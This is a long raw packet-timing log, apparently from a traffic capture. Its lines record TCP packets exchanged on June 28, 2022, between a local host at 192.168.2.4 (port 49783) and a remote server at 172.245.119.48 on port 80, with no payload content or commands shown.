                                                                                                                                                                                            Jun 28, 2022 10:46:38.110594034 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110614061 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110616922 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110634089 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110652924 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110656023 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110675097 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110697985 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110697985 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110718012 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110733032 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110735893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110754967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110763073 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110774994 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110794067 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110800028 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110816002 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110838890 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110843897 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110863924 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110863924 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110882998 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110902071 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110908031 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110920906 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110940933 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110949039 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110964060 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110975981 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110986948 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111002922 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111006975 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111027002 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111037016 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111047029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111063957 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111066103 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111084938 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111105919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111107111 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111129999 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111131907 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111148119 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111169100 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111171007 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111187935 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111206055 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111212015 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111224890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111233950 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111247063 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111270905 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111274004 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111290932 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111310959 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111311913 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111330986 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111336946 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111351013 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111368895 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111375093 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111391068 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111413002 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.111439943 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230112076 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230148077 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230166912 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230186939 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230205059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230223894 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230226994 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230243921 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230262995 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230263948 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230282068 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230302095 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230320930 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230320930 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230339050 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230353117 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230359077 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230380058 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230392933 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.230432034 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231040955 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231070042 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231089115 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231106997 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231117010 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231127024 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231168985 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231173038 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231188059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231209993 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231215000 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231255054 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231270075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231291056 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231308937 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231311083 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231329918 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231348991 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231348991 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231391907 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231395006 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231415033 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231432915 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231446028 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231465101 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231470108 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231483936 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231492996 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231503963 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231522083 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231524944 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231544018 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231559038 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231576920 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231595039 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231596947 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231616974 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231633902 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231635094 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231654882 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231661081 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231698990 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231745958 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231765032 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231786013 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231787920 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231807947 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231826067 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231832027 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231864929 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231873035 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231880903 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231898069 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231906891 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231915951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231955051 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231962919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231978893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.231993914 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232026100 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232028961 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232043028 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232059956 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232065916 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232078075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232098103 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232110977 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232115984 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232132912 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232151985 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232180119 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232188940 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232206106 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232222080 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232228994 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232239008 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232245922 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232271910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232286930 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232301950 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232320070 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232322931 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232347012 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232361078 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232368946 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232387066 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232393980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232403040 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232419968 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232429028 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232467890 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232489109 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232507944 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232525110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232527971 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232542038 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232558966 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232566118 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232605934 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232606888 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232624054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232640982 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232645035 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232681990 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232707977 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232726097 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232748985 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232750893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232768059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232784986 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232785940 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232800961 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232831955 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232836962 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232851982 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232856035 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232876062 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232892990 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232892990 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232916117 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232927084 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232933044 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232952118 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232965946 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232968092 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232985973 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233010054 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233014107 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233031988 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233033895 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233047962 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233064890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233073950 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233082056 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233098030 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233114004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233114004 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233139038 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233165979 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233181000 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233196020 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233212948 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233232975 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233233929 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233248949 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233267069 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233273983 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233298063 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233341932 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233360052 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233376980 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233392954 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233401060 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233409882 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233426094 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233428001 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233443975 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233452082 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233493090 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233500004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233516932 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233532906 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233536959 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233577013 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233608007 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233624935 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233640909 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233644962 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233656883 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233675003 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233681917 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233690977 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233706951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233720064 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233724117 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233746052 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233773947 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233795881 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233818054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233835936 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233846903 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233851910 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233867884 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233880997 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233916998 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233932018 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233948946 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233975887 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233975887 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233993053 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234008074 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234035015 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234076023 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234076023 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234092951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234111071 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234127045 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234143972 CEST8049783172.245.119.48192.168.2.4
